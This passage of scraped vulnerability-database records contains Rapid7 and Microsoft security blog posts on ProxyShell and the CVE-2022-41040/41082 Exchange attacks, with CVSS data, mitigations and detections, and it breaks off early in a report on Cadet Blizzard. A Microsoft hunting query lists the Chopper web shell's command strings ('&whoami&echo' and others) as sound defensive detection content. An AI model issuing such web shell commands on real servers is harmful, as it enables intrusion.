6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-12T17%3A57%3A38%2B01%3A00..2021-08-20T05%3A13%3A43-05%3A00%22>)\n * [Full diff 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/compare/6.1.0...6.1.1>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T19:12:00", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21307", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T19:12:00", "id": "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "href": "https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T18:57:37", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light. Rapid7 also has a [technical analysis of the ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) in AttackerKB._\n\nOn August 5, 2021, in [a Black Hat USA talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>), DEVCORE researcher Orange Tsai shared information on [several exploit chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented were ProxyLogon, which was [exploited en masse in February and March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) of 2021, and ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. As of August 12, 2021, multiple researchers have detected widespread opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using the ProxyShell chain.\n\nAccording to Orange Tsai's demonstration, the ProxyShell exploit chain allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. The exploit is comprised of three discrete CVEs:\n\n * [CVE-2021-34473](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34473/>), a remote code execution vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34523/>), an elevation of privilege vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-31207](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-31207/>), a security feature bypass [patched May 11, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>)\n\n_While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft\u2019s advisories note that they were inadvertently omitted from publication until July._\n\nWhen chained, these vulnerabilities allow the attacker to bypass ACL controls, send a request to a PowerShell back-end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution. Both public and private proof-of-concept exploits have been released as of August 18, 2021\u2014not surprising, since ProxyShell was first demonstrated more than four months ago at Pwn2Own. A number of [technical analyses](<https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/>) of the chain have also [been published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>). See Rapid7's exploit chain analysis [in AttackerKB](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>).\n\nNotably, there has been confusion about which CVE is which across various advisories and research descriptions \u2014 Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but [Orange Tsai\u2019s Black Hat slides](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) list CVE-2021-34473 as the initial ACL bypass. Community researchers have also [expressed confusion](<https://twitter.com/GossiTheDog/status/1424791670076411905>) over CVE numbering across the ProxyShell chain, but ultimately, the takeaway is the same: Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise.\n\n## Affected products\n\nThe following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:\n\n * Microsoft Exchange Server 2019 Cumulative Update 9\n * Microsoft Exchange Server 2019 Cumulative Update 8\n * Microsoft Exchange Server 2016 Cumulative Update 20\n * Microsoft Exchange Server 2016 Cumulative Update 19\n * Microsoft Exchange Server 2013 Cumulative Update 23\n\nOrganizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that all Exchange instances are patched on a zero-day basis. In order to do this, it is vital that defenders keep up-to-date with quarterly Cumulative Updates, since Microsoft only releases security fixes for [the most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>).\n\nWhile ProxyShell and March\u2019s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be valuable and accessible attack surface area for both sophisticated and run-of-the-mill threat actors, and we will certainly see additional widespread exploitation in the future.\n\nRead more from our emergent threat response team on [high-priority attack surface area](<https://www.rapid7.com/blog/post/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/>), including Windows Print Spooler and Pulse Connect Secure VPNs.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all three ProxyShell CVEs with authenticated vulnerability checks.\n\nThe following attacker behavior detection is available InsightIDR customers:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\nThis detection will identify processes spawned by Microsoft IIS processes that have been configured to serve as Outlook Web Access web servers for Microsoft Exchange. Rogue processes being spawned may be an indication of a successful attack against these systems and has been observed targeted by various malicious actors.\n\nIf this detection fires in your environment, you should determine whether it is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having any possibly affected users change their passwords.\n\n## Updates\n\n**August 25, 2021:** Rapid7 estimates that there are over 84,000 Exchange servers that appear vulnerable to the ProxyShell attack chain. \n\n\n**August 23, 2021:** Multiple sources have now [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that at least one ransomware gang (LockFile) is chaining ProxyShell with PetitPotam (CVE-2021-36942) to compromise Windows domain controllers. See [Rapid7's blog on PetitPotam](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for patching and additional required mitigation advice.\n\n**August 21, 2021:** Rapid7's Managed Detection and Response (MDR) and Incident Response (IR) teams have noted a significant uptick in Exchange exploitation by multiple threat actors. Community researchers have also noted that attackers are exploiting the ProxyShell vulnerabilities to drop webshells and [spread ransomware](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) on vulnerable targets.\n\nWe are monitoring for additional attacker behavior and will update this blog as further information comes to light.\n\n**August 16, 2021:** We have begun to see public proof-of-concept (PoC) code implementing the ProxyShell exploit chain. Exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T21:08:43", "type": "rapid7blog", "title": "ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-12T21:08:43", "id": "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "href": "https://blog.rapid7.com/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-10-07T17:09:27", "description": "> **October 1, 2022** **update** \u2013 Added information about _Exploit:Script/ExchgProxyRequest.A_, Microsoft Defender AV\u2019s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance. \n\nMicrosoft is aware of [limited targeted attacks](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for mitigation guidance regarding these vulnerabilities. \n\nCVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.\n\n## Analysis of observed activity\n\n### Attacks using Exchange vulnerabilities prior to public disclosure\n\nMSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\n\nMicrosoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.\n\nFigure 1: Diagram of attacks using Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082\n\n### Observed activity after public disclosure\n\nOn September 28, 2022, GTSC released a [blog](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.\n\nWhile these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.\n\n## Mitigation\n\nCustomers should refer to [Microsoft Security Response Center\u2019s post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for the latest on mitigations for the Exchange product.\n\nMicrosoft Exchange Server customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-365-defender>) are advised to follow this checklist:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Detection\n\n### Microsoft Defender Antivirus\n\n**Microsoft Exchange AMSI integration and Antivirus Exclusions**\n\nExchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the [guidance provided by the Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/bc-p/2576429/highlight/true>), as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange. \n\nMany organizations exclude Exchange directories from antivirus scans for performance reasons. It\u2019s highly recommended to audit AV exclusions on Exchange systems and assess if they can be removed without impacting performance and still ensure the highest level of protection. Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.\n\nTo audit AV exclusions on an Exchange Server running Defender Antivirus, launch the _Get-MpPreference_ command from an elevated PowerShell prompt.\n\nIf exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.\n\nMicrosoft Defender Antivirus detects the post-exploitation malware currently used in-the-wild exploitation of this vulnerability as the following:\n\n**Microsoft Defender Antivirus detections ******| **MITRE** **ATT&CK Tactics observed ** \n---|--- \n[Exploit:Script/ExchgProxyRequest.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.A&threatId=-2147134610>) \n[Exploit:Script/ExchgProxyRequest.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.B&threatId=-2147134593>) \n[Exploit:Script/ExchgProxyRequest.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.C&threatId=-2147134381>) \n(the most robust defense from Microsoft Defender AV against this threat; requires Exchange AMSI to be enabled)| Initial Access \n[Backdoor:ASP/Webshell.Y](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:ASP/Webshell.Y>)| Persistence \n[Backdoor:Win32/RewriteHttp.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/RewriteHttp.A>)| Persistence \n[Backdoor:JS/SimChocexShell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/SimChocexShell.A!dha&threatId=-2147134707>)| Persistence \n[Behavior:Win32/IISExchgDropWebshell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.A!dha&threatId=-2147189378>)| Persistence \nBehavior:Win32/IISExchgDropWebshell.A | Persistence \n[Trojan:Win32/IISExchgSpawnCMD.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/IISExchgSpawnCMD.A&threatId=-2147190657>)| Execution \n[Trojan:Win32/WebShellTerminal.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.A&threatId=-2147189572>) | Execution \n[Trojan:Win32/WebShellTerminal.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.B&threatId=-2147138186>) | Execution \n \n### Microsoft Defender for Endpoint\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint>) detects post-exploitation activity. The following alerts could be related to this threat:\n\n**Indicators of attack******| **MITRE** **ATT&CK Tactics observed ** \n---|--- \nPossible web shell installation | Persistence \nPossible IIS web shell | Persistence \nSuspicious Exchange Process Execution | Execution \nPossible exploitation of Exchange Server vulnerabilities (Requires Exchange AMSI to be enabled)| Initial Access \nSuspicious processes indicative of a web shell | Persistence \nPossible IIS compromise | Initial Access \n \nAs of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:\n\n**Indicators of attack******| **MITRE ATT&CK Tactics observed ** \n---|--- \n'Chopper' malware was detected on an IIS Web server | Persistence \n'Chopper' high-severity malware was detected | Persistence \n \n### Microsoft Defender Threat Intelligence\n\n[Microsoft Defender Threat Intelligence](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-defender-threat-intelligence>) (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.\n\n### Microsoft Defender Vulnerability Management\n\nMicrosoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational [exposure score](<https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide>). Customers can use the following capabilities to identify vulnerable devices and assess exposure:\n\n * Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.\n * Use the _DeviceTvmSoftwareVulnerabilities_ table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:\n \n \n DeviceTvmSoftwareVulnerabilities\n | where CveId in (\"CVE-2022-41040\", \"CVE-2022-41082\")\n \n\nFigure 2: Screenshot of the CVE information page where users can also take a look at related exposed device, software information, open vulnerability page, report inaccuracy, or read other useful references.\n\nNOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.\n\n## Advanced hunting\n\n### Microsoft Sentinel\n\nBased on what we\u2019re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on [web shell threat hunting with Microsoft Sentinel](<https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968>) also provides guidance on looking for web shells in general. \n\nThe [Exchange SSRF Autodiscover ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/08a8d2b9c5c9083e341be447773a34b56b205dee/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>) detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new [Exchange Server Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>) and [Exchange Worker Process Making Remote Call](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/ExchangeWorkerProcessMakingRemoteCall.yaml>) queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:\n\n * [Exchange OAB virtual directory attribute containing potential web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ExchangeOABVirtualDirectoryAttributeContainingPotentialWebshell.yaml>) \n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/WebShellActivity.yaml>) \n * [Malicious web application requests linked with Microsoft Defender for Endpoint alerts](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/MaliciousAlertLinkedWebRequests.yaml>) \n * [Exchange IIS worker dropping web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Execution/exchange-iis-worker-dropping-webshell.yaml>) \n * [Web shell detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/PotentialWebshell.yaml>) \n\n### Microsoft 365 Defender\n\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\n\n**Chopper web shell**\n\nUse this query to hunt for Chopper web shell activity:\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"w3wp.exe\"\n | where ProcessCommandLine has_any (\"&ipconfig&echo\", \"&quser&echo\", \"&whoami&echo\", \"&c:&echo\", \"&cd&echo\", \"&dir&echo\", \"&echo [E]\", \"&echo [S]\")\n \n\n**Suspicious files in Exchange directories**\n\nUse this query to hunt for suspicious files in Exchange directories:\n \n \n DeviceFileEvents\n | where Timestamp >= ago(7d)\n | where InitiatingProcessFileName == \"w3wp.exe\"\n | where FolderPath has \"FrontEnd\\\\HttpProxy\\\\\"\n | where InitiatingProcessCommandLine contains \"MSExchange\"\n | project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp\n\n## External attack surface management\n\n### Microsoft Defender External Attack Surface Management\n\n[Microsoft Defender External Attack Surface Management](<https://www.microsoft.com/en-us/security/business/cloud-security/microsoft-defender-external-attack-surface-management>) continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.\n\nA High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. This insight, titled _CVE-2022-41082 & CVE-2022-41040 - Microsoft Exchange Server Authenticated SSRF and PowerShell RCE_, can be found under the high severity observations section of the Attack Surface Summary dashboard.\n\nThe post [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T04:21:00", "type": "mssecure", "title": "Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T04:21:00", "id": "MSSECURE:C857BFAD4920FD5B25BF42D5469945F6", "href": "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-23T15:26:13", "description": "As Russia\u2019s invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provide greater clarity into the tools and techniques used by Russian state-sponsored threat actors. Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense. These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.\n\nToday, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>)\u2014a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor\u2019s tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>). \n\nMicrosoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations. Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as \u201cFree Civilian\u201d.\n\nMicrosoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia\u2019s invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard\u2019s operations, though comparatively less prolific in both scale and scope to more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.\n\nMicrosoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia\u2019s war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard. As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we\u2019re sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.\n\n## Who is Cadet Blizzard?\n\nCadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions\u2019 websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month 